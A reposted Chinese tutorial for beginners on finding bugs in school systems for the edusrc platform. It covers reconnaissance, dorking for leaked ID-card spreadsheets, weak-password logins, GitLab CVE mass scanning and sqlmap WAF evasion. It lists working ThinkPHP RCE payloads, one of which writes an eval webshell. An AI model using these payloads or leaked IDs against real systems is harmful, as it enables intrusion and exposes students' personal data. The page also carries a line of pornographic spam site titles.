精品国产人成在线_亚洲高清无码在线观看_国产在线视频国产永久2021_国产AV综合第一页一个的一区免费影院黑人_最近中文字幕MV高清在线视频

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

小白快速入門src挖掘(以edusrc平臺為例)

jf_Fo0qk3ln ? 來源:菜鳥學信安 ? 2023-05-05 11:30 ? 次閱讀

edusrc挖掘心得

edusrc平臺介紹

我們可以在關于頁面看到edusrc的收錄規(guī)則

現(xiàn)階段,教育行業(yè)漏洞報告平臺接收如下類別單位漏洞:

  • 教育部

  • 各省、自治區(qū)教育廳、直轄市教委、各級教育局

  • 學校

  • 教育相關軟件

可以看到不僅是大學的資產、還有小學初中高中的教育局的也可以交到上面、而資產不僅只有網站,也可以從小程序,app方面入手,不過這方面利用難度就要大一些

一些思路

0x01信息搜集

收集到別人收集不到的資產,就能挖到別人挖不到的洞。

網絡空間測繪

奇安信的鷹圖,fofa等

查詢教育資產的語法:domain="edu.cn"表示搜索以edu.cn為結尾的資產,ip.isp="教育",表示搜索教育網段的資產,后者的搜索規(guī)模是比前者大很多

子域名搜集

OneForAll 、github知名的子域名收集工具

目前支持一鍵收集:子域、子域常用端口、子域Title、子域狀態(tài)、子域服務器等

site:***.edu.cn 谷歌語法也可以幫助我們找到一些域名信息

whois反查:

whois反查(知道該注冊人擁有哪些域名)

電話反查

域名多的情況下,還可以域名批量反查

最后可以把以上工具搜集到的子域名去重就得到了一份完整的大學網站域名資產,這種做法對滲透一些證書大學很有幫助。

學號、身份證收集

這里就可以利用谷歌語法搜集

filetype:xls site:xxx.edu 身份證

有時候運氣好就可以搜集到泄露的身份證信息,+1rank(從來沒遇到過)

如果能用這種方法搜集到對應的學號身份證,就可以進系統(tǒng)測試了!或者直接連上vpn進內網上fscan掃描(這里的話可以通過上面說的搜集到的子域名去獲得對應的內網ip地址,

指紋識別

非常有用

谷歌插件wappalyzer:

d2e9bb12-eaeb-11ed-90ce-dac502259ad0.png

c段旁站信息

這里我使用這個工具Cscan,雖然有些小bug但是也是非常推薦

d2f478e0-eaeb-11ed-90ce-dac502259ad0.png

還有一些在線網站:潮汐指紋

js api接口發(fā)現(xiàn)

這兩個工具都可以去github下載

jsfind
Packer-Fuzzer(webpack 打包的前端都可以掃一下有驚喜

我的一些騷思路

廢話不多說了

先說一下我感受的挖洞難度:證書大學站> 資產多的普通大學 > 資產多的職業(yè)學院 > 有賬號密碼能進內網

所以我一開始是去找那種職業(yè)學院打的,大概是排行榜50多頁的學校,可以用鷹圖title="xxxx"進行搜集,

d300b2b8-eaeb-11ed-90ce-dac502259ad0.jpg

因為一些帶專網站的安全意識比較差的,所以有時候能遇到那種弱口令進后臺文件上傳拿shell的,關于弱口令:用戶名一般是admin ,密碼一般是123456,admin,888888 三選一,不是的話可以撤退了

弱口令真的yyds

除了弱口令

然后說一下其他思路

比如說think5未開強制路由RCE,這種網站很多大學都存在,但是尋找thinkphp符和條件的網站卻很難,一種利用鷹圖就是搜索默認圖標hash值來尋找,但是這種估計很難撿到,但是在閑逛的過程中看到路由規(guī)則類似thinkphp的可以嘗試一下(靠這個上了十多rank

d3090102-eaeb-11ed-90ce-dac502259ad0.jpg

一些payload:

5.1.x


	
?s=index/	hinkRequest/input&filter[]=system&data=pwd
?s=index/	hinkviewdriverPhp/display&content= phpinfo();?>
?s=index/	hink	emplatedriverfile/write&cacheFile=shell.php&content= phpinfo();?>
?s=index/	hinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

5.0.x


	
?s=index/thinkconfig/get&name=database.username # 獲取配置信息
?s=index/	hinkLang/load&file=../../test.jpg    # 包含任意文件
?s=index/	hinkConfig/load&file=../../t.php     # 包含任意.php文件
?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

寫入 shell


	
public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../shell.php&vars[1][]=php @eval($_REQUEST[cmd]);?>

然后然后,講一下我一些思路,使用一些Nday來快速上分,或者挖掘邏輯漏洞實現(xiàn)通殺

關于Nday這里舉倆個例子大家自行體會

比如說你知道有一個cve 比方說這個gitlab的cve:gitlab-CVE-2021-22205,gitlab顯而易見的是很多高校都有這個gitlab的托管網站

所以說我們只要把所有gitlab edu上的資產全部搜集過來然后利用腳本一一檢測就了

這里說一下怎么搜集的

**先從圖標下手,限定edu域名:可以看到有17條資產

d31243a2-eaeb-11ed-90ce-dac502259ad0.jpg

限定ip有27條資產

d31cd1e6-eaeb-11ed-90ce-dac502259ad0.png

去除圖標的有45條資產

d32466ea-eaeb-11ed-90ce-dac502259ad0.png

把數據全部導出收集到一起,利用github上的腳本進行檢測,這樣就撿到倆個洞,因為gitlab這個cve是可以反彈shell的,所以12rank到手

d32eface-eaeb-11ed-90ce-dac502259ad0.jpg

再說一個比如說springboot未授權訪問漏洞:

同上一樣的方法:直接搜java白頁,把數據導出->腳本檢測

d337ef44-eaeb-11ed-90ce-dac502259ad0.png

因為范圍足夠大所以也能有不小收獲

d3412ce4-eaeb-11ed-90ce-dac502259ad0.jpg

剩下的可以自己探索,或者有更好的思路可以交流

邏輯漏洞

這里可以使用jsfind腳本去尋找一些js接口,可能會有未授權文件上傳,ssrf等等,或者在登錄抓取返回包把false改成true等操作,去實現(xiàn)登錄繞過,總之來說就是要細心的閱讀源碼,找接口。

sql注入

尋找注入點方法:site:edu.cn inurl:xxx.php|jsp|asp?xxx= xxx可以自己發(fā)揮想象 ,或者在一些老系統(tǒng)登錄,支付平臺上都有可能存在注入

但是sql注入大多學校都上了waf,繞過waf不容易,主要的方法有內聯(lián),分段,以及垃圾字符填充等等

這里舉一個繞安全狗的例子:

這里原本的參數是a和b,但是a,b參數的輸入會被waf檢測,通過攔截可以看出是常見的安全狗waf,所以這里可以多添加倆個參數:aa,bb(后端不會接收這兩個參數,但是安全狗不會檢測注釋里的內容,這樣就簡單繞過了),指定好注入點使用sqlmap輕松拿下。

sqlmap -u "xxx.aspx?aa=/*&a=1&b=2&bb=*/" -p "b" --random-agent

d34b1916-eaeb-11ed-90ce-dac502259ad0.jpg



審核編輯 :李倩


聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • 服務器
    +關注

    關注

    12

    文章

    9024

    瀏覽量

    85186
  • 漏洞
    +關注

    關注

    0

    文章

    204

    瀏覽量

    15358

原文標題:小白快速入門src挖掘(以edusrc平臺為例)

文章出處:【微信號:菜鳥學信安,微信公眾號:菜鳥學信安】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦

    NFC核心板講述基于AWorks平臺開發(fā)的具體方法

    ZLG致遠電子推出了一系列“MCU+無線”核心板,本文NFC核心板講述基于AWorks平臺開發(fā)的具體方法。
    的頭像 發(fā)表于 06-22 09:16 ?6410次閱讀
    <b class='flag-5'>以</b>NFC核心板<b class='flag-5'>為</b><b class='flag-5'>例</b>講述基于AWorks<b class='flag-5'>平臺</b>開發(fā)的具體方法

    PADS快速入門高清視頻

    ` 本帖最后由 foshanlengqian 于 2015-6-23 17:35 編輯 PADS快速入門高清視頻,本次視頻是高清有聲視頻,快速上手,告別PADS小白的弱智問答,所有
    發(fā)表于 06-23 17:31

    NLPIR智能技術推動NLP語義挖掘快速發(fā)展

    產業(yè)產生重要影響,還將催生一體化數據存儲處理服務器、內存計算等市場。在軟件與服務領域,大數據將引發(fā)數據快速處理分析、數據挖掘技術和軟件產品的發(fā)展。大數據利用將成為提高核心競爭力的關鍵因素。各行各業(yè)
    發(fā)表于 03-14 11:50

    [經驗] 如何學習STM32的庫函數(GPIO配置

    的資料跟大家分享一下。介紹如何學習、解釋STM32的庫函數,GPIO配置。下面是介紹內容。 意法半導體在推出STM32微控制器之初,也同時提供了一套完整細致的固件開發(fā)包,里面包含了在STM32開發(fā)
    發(fā)表于 06-19 19:53

    redhat的github使用

    github上有許多開源的項目,你可以把代碼下下來學習研究。或者你也可以自己創(chuàng)建個項目,用github來做版本管理,比svn用起來方便多了啊。下面redhat說下怎么使用github。
    發(fā)表于 07-16 06:07

    【視頻推薦】智能語音魚缸,講解機智云代碼

    機智云代碼講解本視頻智能語音魚缸,按照如下圖所示的文件內容目錄,詳細講解機智云代碼,如主要文件、相關函數、功能定義與數據點的關系、魚缸電路圖詳解等內容,方便新手快速
    發(fā)表于 07-19 17:15

    快速移植OpenHarmony到三方芯片平臺的方法

    HDF等)的移植。詳細步驟在接下來的章節(jié)中介紹。移植到三方芯片平臺的步驟下面樹莓派3b (BCM2837) ,演示將OpenHarmony移植到樹莓派的過程。準備整體構建環(huán)境將三
    發(fā)表于 04-12 11:08

    hello world介紹如何讓代碼部署并運行在ARM平臺

    1、hello world介紹如何讓代碼部署并運行在ARM平臺上CI(Continuous Integration)讓我們可以不斷對小的代碼修改進行部署,測試,而不需要等代碼有大
    發(fā)表于 07-11 15:44

    ULN2003繼電器的作用

    ULN2003繼電器的作用
    發(fā)表于 08-13 11:06 ?4.3w次閱讀
    <b class='flag-5'>以</b>ULN2003<b class='flag-5'>為</b><b class='flag-5'>例</b>繼電器的作用

    LabVIEW入門與實戰(zhàn)開發(fā)100

    LabVIEW入門與實戰(zhàn)開發(fā)100LabVIEW入門與實戰(zhàn)開發(fā)100LabVIEW入門與實戰(zhàn)開發(fā)100
    發(fā)表于 02-18 11:44 ?0次下載

    合泰32位單片機入門/HT32F52352

    合泰32位單片機入門/HT32F52352Hi!很高興看到你。以前經常在CSDN上查找資料,經常能找到想要的,因此也希望在此分享自己的學習心得與收獲。32位的單片機其實都差不多,
    發(fā)表于 11-18 19:51 ?14次下載
    合泰32位單片機<b class='flag-5'>入門</b>/<b class='flag-5'>以</b>HT32F52352<b class='flag-5'>為</b><b class='flag-5'>例</b>

    小白初學者從零開始創(chuàng)建stm32工程(包括帶著的FreeRTOS實時操作系統(tǒng)快速入門

    小白初學者從零開始創(chuàng)建stm32工程(包括帶著的FreeRTOS實時操作系統(tǒng)快速入門
    發(fā)表于 12-05 18:21 ?20次下載
    <b class='flag-5'>小白</b>初學者從零開始創(chuàng)建stm32工程(包括帶著的FreeRTOS實時操作系統(tǒng)<b class='flag-5'>快速</b><b class='flag-5'>入門</b>)

    ESPHome入門00 - 簡介(小白入門, 硬件準備)

    Esphome入門00- 簡介(小白入門, 廢話較多)
    發(fā)表于 12-16 16:52 ?13次下載
    ESPHome<b class='flag-5'>入門</b>00 - 簡介(<b class='flag-5'>小白</b><b class='flag-5'>入門</b>, 硬件準備)

    使用RESET按鈕切換LED實現(xiàn)快速

    電子發(fā)燒友網站提供《使用RESET按鈕切換LED實現(xiàn)快速.zip》資料免費下載
    發(fā)表于 02-06 14:36 ?0次下載
    使用RESET按鈕切換LED<b class='flag-5'>以</b>實現(xiàn)<b class='flag-5'>快速</b>用<b class='flag-5'>例</b>

    ALLEGRO 約束規(guī)則設置步驟(DDR ).zip

    ALLEGRO約束規(guī)則設置步驟(DDR
    發(fā)表于 12-30 09:19 ?12次下載